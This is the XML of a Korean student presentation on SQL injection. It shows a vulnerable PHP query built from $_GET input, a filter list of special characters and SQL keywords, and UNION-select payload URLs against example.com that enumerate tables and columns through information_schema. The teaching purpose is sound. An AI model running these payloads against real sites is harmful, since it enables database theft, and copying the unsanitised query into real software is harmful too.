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76" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="277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우 김" initials="진김" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="7218a4b7a111de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AA1793-7E9D-4E79-8404-E3B0FD0A2F9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F9EFCC-41AE-471D-8BA7-67861CBDA9B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="ko-KR"/>
            <a:t>동적 구문 생성</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{82845D66-A4DC-4AE1-930E-990A12D2DD7A}" type="parTrans" cxnId="{99216D17-5723-4418-A575-E9D5348C72C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{47CC7992-A7DB-40BD-92CC-1D641D4406E8}" type="sibTrans" cxnId="{99216D17-5723-4418-A575-E9D5348C72C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F53D720E-B9B2-493A-8C0D-CEF163F95BC4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="ko-KR"/>
            <a:t>개발자가 의도하지 않은 쿼리문이 생성되어 악용 될 수 있음</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{76BB103B-B501-44F4-A1EC-3E5A11B609F9}" type="parTrans" cxnId="{DD237406-9A49-46B1-99D4-E5307A978B2B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC1D224A-09BA-4C42-9069-6BFDB509C07B}" type="sibTrans" cxnId="{DD237406-9A49-46B1-99D4-E5307A978B2B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A667395-675B-4436-87A0-E11CCEE84562}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>$query = “SELECT * FROM table WHERE id = $_GET[“id”]’”;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9686F2B-5118-495D-BBAE-F7D2723FA005}" type="parTrans" cxnId="{BF347188-3FF6-48FF-91B8-051364C61F0A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C6D2369-D1FD-474A-9260-F4F993DD1F02}" type="sibTrans" cxnId="{BF347188-3FF6-48FF-91B8-051364C61F0A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93224D95-17B3-4B12-8BC2-D756509F8638}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="ko-KR"/>
            <a:t>부적절한 특수 문자 처리</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55E095BC-EEF8-4F4E-88F4-8948526EA74B}" type="parTrans" cxnId="{9239D6A9-6A2A-4D67-A2E9-64B4219D51DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDAA2E30-53A2-462D-89F8-7370D658E32A}" type="sibTrans" cxnId="{9239D6A9-6A2A-4D67-A2E9-64B4219D51DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FCA8B7A-63DC-4BE1-A891-2FBB209481E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="ko-KR"/>
            <a:t>따옴표</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>( ‘ ), </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR"/>
            <a:t>더블파이프</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>( || ), </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR"/>
            <a:t>마침표</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>( . ), </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR"/>
            <a:t>주석처리</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>( */ ), </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR"/>
            <a:t>쌍 따옴표</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>( “ ) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR"/>
            <a:t>등 특수문자들을 쿼리문이 인식 가능</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FCB858FF-3F51-434C-8313-7215C5155E44}" type="parTrans" cxnId="{D18E41BD-E638-41AC-A4CC-AE836220EBFA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B280B724-550A-4AA6-B98C-A9ADC113FC00}" type="sibTrans" cxnId="{D18E41BD-E638-41AC-A4CC-AE836220EBFA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8390FE9C-9BA8-4081-8393-972D7EDE350E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="ko-KR"/>
            <a:t>이러한 특수 문자들은 필터링 필요</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E82DA35-775C-4AC1-8E34-53AF49C5AF50}" type="parTrans" cxnId="{42445C8F-5086-47CE-8C5F-E03F21B57FE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A02FECF-1EB9-4CB6-BBD1-DA98B4A9434B}" type="sibTrans" cxnId="{42445C8F-5086-47CE-8C5F-E03F21B57FE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4F7D1CD-98BC-43F6-855E-FA62D0854B32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" i="1"/>
            <a:t>/*, –, ‘, “, ?, #, (, ), ;, @, =, *, +, union, select, drop, update, from, where, join, substr, user_tables, user_table_columns, information_schema, sysobject, table_schema, declare, dual,…</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDC243B0-2EF2-4EC5-A92C-C73FD7B52D6D}" type="parTrans" cxnId="{44599CDD-D4B4-4017-9E70-AFE0DC332E12}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FDA298F-415E-4E07-9284-095E6411C39E}" type="sibTrans" cxnId="{44599CDD-D4B4-4017-9E70-AFE0DC332E12}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02ED20EE-BC64-4E1C-B325-E95C3EF75011}" type="pres">
      <dgm:prSet presAssocID="{15AA1793-7E9D-4E79-8404-E3B0FD0A2F9E}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8A915EED-493F-4409-BE85-6C125C37F0AD}" type="pres">
      <dgm:prSet presAssocID="{06F9EFCC-41AE-471D-8BA7-67861CBDA9B0}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{980DC113-AE38-41A3-9833-5CA05C405035}" type="pres">
      <dgm:prSet presAssocID="{06F9EFCC-41AE-471D-8BA7-67861CBDA9B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EB8833-6760-465A-9F72-853667EC56B7}" type="pres">
      <dgm:prSet presAssocID="{06F9EFCC-41AE-471D-8BA7-67861CBDA9B0}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5CC17696-303A-4622-9DDE-57970847675B}" type="pres">
      <dgm:prSet presAssocID="{47CC7992-A7DB-40BD-92CC-1D641D4406E8}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{90E72CE8-B43C-42B6-84BA-82BB7AB030D9}" type="pres">
      <dgm:prSet presAssocID="{93224D95-17B3-4B12-8BC2-D756509F8638}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9B6CA980-AF93-46CA-9459-5F267209A65C}" type="pres">
      <dgm:prSet presAssocID="{93224D95-17B3-4B12-8BC2-D756509F863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7977A50-7AF6-4920-A1B3-ADCC14928568}" type="pres">
      <dgm:prSet presAssocID="{93224D95-17B3-4B12-8BC2-D756509F8638}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F756F0F-96FE-4CCE-91AD-F03F5AFD2403}" type="pres">
      <dgm:prSet presAssocID="{DDAA2E30-53A2-462D-89F8-7370D658E32A}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0BB8FDF0-6B4A-4628-9528-C3C2E0C83F7C}" type="pres">
      <dgm:prSet presAssocID="{8390FE9C-9BA8-4081-8393-972D7EDE350E}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7FB82D62-4172-4FE9-9C04-9FA262A3F611}" type="pres">
      <dgm:prSet presAssocID="{8390FE9C-9BA8-4081-8393-972D7EDE350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3C92634-F1E2-4C5C-BAC4-5EFF0E9D56DA}" type="pres">
      <dgm:prSet presAssocID="{8390FE9C-9BA8-4081-8393-972D7EDE350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F089903-76CA-4D57-B46B-ECC4C9213028}" type="presOf" srcId="{1FCA8B7A-63DC-4BE1-A891-2FBB209481E9}" destId="{67977A50-7AF6-4920-A1B3-ADCC14928568}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{DD237406-9A49-46B1-99D4-E5307A978B2B}" srcId="{06F9EFCC-41AE-471D-8BA7-67861CBDA9B0}" destId="{F53D720E-B9B2-493A-8C0D-CEF163F95BC4}" srcOrd="0" destOrd="0" parTransId="{76BB103B-B501-44F4-A1EC-3E5A11B609F9}" sibTransId="{CC1D224A-09BA-4C42-9069-6BFDB509C07B}"/>
    <dgm:cxn modelId="{99216D17-5723-4418-A575-E9D5348C72C8}" srcId="{15AA1793-7E9D-4E79-8404-E3B0FD0A2F9E}" destId="{06F9EFCC-41AE-471D-8BA7-67861CBDA9B0}" srcOrd="0" destOrd="0" parTransId="{82845D66-A4DC-4AE1-930E-990A12D2DD7A}" sibTransId="{47CC7992-A7DB-40BD-92CC-1D641D4406E8}"/>
    <dgm:cxn modelId="{DB69641A-4B50-4060-BC13-18D9BC8466E9}" type="presOf" srcId="{C4F7D1CD-98BC-43F6-855E-FA62D0854B32}" destId="{53C92634-F1E2-4C5C-BAC4-5EFF0E9D56DA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{FC9E6C1C-9D92-4BAB-9394-B9BA004C1461}" type="presOf" srcId="{15AA1793-7E9D-4E79-8404-E3B0FD0A2F9E}" destId="{02ED20EE-BC64-4E1C-B325-E95C3EF75011}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{C557A523-598F-4003-A382-5EE7E7580C04}" type="presOf" srcId="{93224D95-17B3-4B12-8BC2-D756509F8638}" destId="{9B6CA980-AF93-46CA-9459-5F267209A65C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{6356162E-A5F9-4DE6-BEE8-C63B14EFF484}" type="presOf" srcId="{F53D720E-B9B2-493A-8C0D-CEF163F95BC4}" destId="{DEEB8833-6760-465A-9F72-853667EC56B7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{BF347188-3FF6-48FF-91B8-051364C61F0A}" srcId="{06F9EFCC-41AE-471D-8BA7-67861CBDA9B0}" destId="{3A667395-675B-4436-87A0-E11CCEE84562}" srcOrd="1" destOrd="0" parTransId="{C9686F2B-5118-495D-BBAE-F7D2723FA005}" sibTransId="{8C6D2369-D1FD-474A-9260-F4F993DD1F02}"/>
    <dgm:cxn modelId="{42445C8F-5086-47CE-8C5F-E03F21B57FE0}" srcId="{15AA1793-7E9D-4E79-8404-E3B0FD0A2F9E}" destId="{8390FE9C-9BA8-4081-8393-972D7EDE350E}" srcOrd="2" destOrd="0" parTransId="{8E82DA35-775C-4AC1-8E34-53AF49C5AF50}" sibTransId="{0A02FECF-1EB9-4CB6-BBD1-DA98B4A9434B}"/>
    <dgm:cxn modelId="{9239D6A9-6A2A-4D67-A2E9-64B4219D51DC}" srcId="{15AA1793-7E9D-4E79-8404-E3B0FD0A2F9E}" destId="{93224D95-17B3-4B12-8BC2-D756509F8638}" srcOrd="1" destOrd="0" parTransId="{55E095BC-EEF8-4F4E-88F4-8948526EA74B}" sibTransId="{DDAA2E30-53A2-462D-89F8-7370D658E32A}"/>
    <dgm:cxn modelId="{D18E41BD-E638-41AC-A4CC-AE836220EBFA}" srcId="{93224D95-17B3-4B12-8BC2-D756509F8638}" destId="{1FCA8B7A-63DC-4BE1-A891-2FBB209481E9}" srcOrd="0" destOrd="0" parTransId="{FCB858FF-3F51-434C-8313-7215C5155E44}" sibTransId="{B280B724-550A-4AA6-B98C-A9ADC113FC00}"/>
    <dgm:cxn modelId="{B2B925C9-979C-4C0F-B1AE-F981A1791B04}" type="presOf" srcId="{06F9EFCC-41AE-471D-8BA7-67861CBDA9B0}" destId="{980DC113-AE38-41A3-9833-5CA05C405035}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{276C16CF-1631-4B7E-9708-8518D0F6992B}" type="presOf" srcId="{8390FE9C-9BA8-4081-8393-972D7EDE350E}" destId="{7FB82D62-4172-4FE9-9C04-9FA262A3F611}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{522B0ED8-740D-40CB-BACE-B6CE2D0411C6}" type="presOf" srcId="{3A667395-675B-4436-87A0-E11CCEE84562}" destId="{DEEB8833-6760-465A-9F72-853667EC56B7}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{44599CDD-D4B4-4017-9E70-AFE0DC332E12}" srcId="{8390FE9C-9BA8-4081-8393-972D7EDE350E}" destId="{C4F7D1CD-98BC-43F6-855E-FA62D0854B32}" srcOrd="0" destOrd="0" parTransId="{BDC243B0-2EF2-4EC5-A92C-C73FD7B52D6D}" sibTransId="{9FDA298F-415E-4E07-9284-095E6411C39E}"/>
    <dgm:cxn modelId="{31220658-8C3A-4BF7-B42E-ACE9E5C4615B}" type="presParOf" srcId="{02ED20EE-BC64-4E1C-B325-E95C3EF75011}" destId="{8A915EED-493F-4409-BE85-6C125C37F0AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{6E5A77AF-4EB6-4E47-BE1D-C73CC436BA10}" type="presParOf" srcId="{8A915EED-493F-4409-BE85-6C125C37F0AD}" destId="{980DC113-AE38-41A3-9833-5CA05C405035}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{D44D95B1-F6AE-41E3-ABCC-F61B1CBEC309}" type="presParOf" srcId="{8A915EED-493F-4409-BE85-6C125C37F0AD}" destId="{DEEB8833-6760-465A-9F72-853667EC56B7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{F437F5FF-1D84-4117-AC02-F4CD7323584A}" type="presParOf" srcId="{02ED20EE-BC64-4E1C-B325-E95C3EF75011}" destId="{5CC17696-303A-4622-9DDE-57970847675B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{235F9C93-09C8-48EF-8470-3C915CDC694F}" type="presParOf" srcId="{02ED20EE-BC64-4E1C-B325-E95C3EF75011}" destId="{90E72CE8-B43C-42B6-84BA-82BB7AB030D9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{C7C66744-79E4-4F70-A510-0C5C90F33AB0}" type="presParOf" srcId="{90E72CE8-B43C-42B6-84BA-82BB7AB030D9}" destId="{9B6CA980-AF93-46CA-9459-5F267209A65C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{5E78C937-2DB7-4FBD-AF76-46C8819EAEDF}" type="presParOf" srcId="{90E72CE8-B43C-42B6-84BA-82BB7AB030D9}" destId="{67977A50-7AF6-4920-A1B3-ADCC14928568}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{2F75C686-9D5D-4102-BF76-61984276CA43}" type="presParOf" srcId="{02ED20EE-BC64-4E1C-B325-E95C3EF75011}" destId="{3F756F0F-96FE-4CCE-91AD-F03F5AFD2403}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{16CCCF3E-7E00-42B4-B8F4-C4BE6F24DB9F}" type="presParOf" srcId="{02ED20EE-BC64-4E1C-B325-E95C3EF75011}" destId="{0BB8FDF0-6B4A-4628-9528-C3C2E0C83F7C}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{38B47443-16D8-42D0-AA51-8A5F275622B9}" type="presParOf" srcId="{0BB8FDF0-6B4A-4628-9528-C3C2E0C83F7C}" destId="{7FB82D62-4172-4FE9-9C04-9FA262A3F611}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{9FF24A55-84C5-4C75-8ACA-4C868C5F795D}" type="presParOf" srcId="{0BB8FDF0-6B4A-4628-9528-C3C2E0C83F7C}" destId="{53C92634-F1E2-4C5C-BAC4-5EFF0E9D56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DC113-AE38-41A3-9833-5CA05C405035}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3037" y="82057"/>
          <a:ext cx="2961642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동적 구문 생성</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3037" y="82057"/>
        <a:ext cx="2961642" cy="662400"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DEEB8833-6760-465A-9F72-853667EC56B7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3037" y="744457"/>
          <a:ext cx="2961642" cy="31962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300" kern="1200"/>
            <a:t>개발자가 의도하지 않은 쿼리문이 생성되어 악용 될 수 있음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$query = “SELECT * FROM table WHERE id = $_GET[“id”]’”;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3037" y="744457"/>
        <a:ext cx="2961642" cy="3196209"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9B6CA980-AF93-46CA-9459-5F267209A65C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3379309" y="82057"/>
          <a:ext cx="2961642" cy="662400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부적절한 특수 문자 처리</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3379309" y="82057"/>
        <a:ext cx="2961642" cy="662400"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{67977A50-7AF6-4920-A1B3-ADCC14928568}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3379309" y="744457"/>
          <a:ext cx="2961642" cy="3196209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300" kern="1200"/>
            <a:t>따옴표</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" kern="1200"/>
            <a:t>( ‘ ), </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" sz="2300" kern="1200"/>
            <a:t>더블파이프</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" kern="1200"/>
            <a:t>( || ), </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" sz="2300" kern="1200"/>
            <a:t>마침표</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" kern="1200"/>
            <a:t>( . ), </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" sz="2300" kern="1200"/>
            <a:t>주석처리</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" kern="1200"/>
            <a:t>( */ ), </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" sz="2300" kern="1200"/>
            <a:t>쌍 따옴표</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" kern="1200"/>
            <a:t>( “ ) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" sz="2300" kern="1200"/>
            <a:t>등 특수문자들을 쿼리문이 인식 가능</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3379309" y="744457"/>
        <a:ext cx="2961642" cy="3196209"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7FB82D62-4172-4FE9-9C04-9FA262A3F611}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6755582" y="82057"/>
          <a:ext cx="2961642" cy="66240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이러한 특수 문자들은 필터링 필요</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6755582" y="82057"/>
        <a:ext cx="2961642" cy="662400"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{53C92634-F1E2-4C5C-BAC4-5EFF0E9D56DA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6755582" y="744457"/>
          <a:ext cx="2961642" cy="3196209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i="1" kern="1200"/>
            <a:t>/*, –, ‘, “, ?, #, (, ), ;, @, =, *, +, union, select, drop, update, from, where, join, substr, user_tables, user_table_columns, information_schema, sysobject, table_schema, declare, dual,…</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6755582" y="744457"/>
        <a:ext cx="2961642" cy="3196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B9FA5-8892-4C9A-937C-7B98B4CCAE5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4B789-FAB6-48A4-92AB-1121EC7C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5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시스템 테이블인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용하여 테이블 명 알아냄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>같은 방식으로 컬럼명도 알아냄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4B789-FAB6-48A4-92AB-1121EC7C2B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3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2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6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1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5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5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6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5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5CF3DF-2DDB-46D7-95C7-25128F36BED6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F4D18D-EC15-4D82-907D-F689878FF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xample.com/?id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?id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ample.com/?idx=-99+union+select+1,group_concat(concat_ws(0x3a,&#52972;&#47100;1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/?idx=-99+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/?idx=-99+union+select+1,group_concat(table_name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835FC-2D10-4FED-A056-BEE53900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400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection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24C114-BEEF-464F-95AF-46BCB1D6F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12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>조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20143118 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>김진우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20143120 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>김태환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0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89FC6-C8C7-42A0-BA6C-04F0A670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공격 유형</a:t>
            </a:r>
            <a:r>
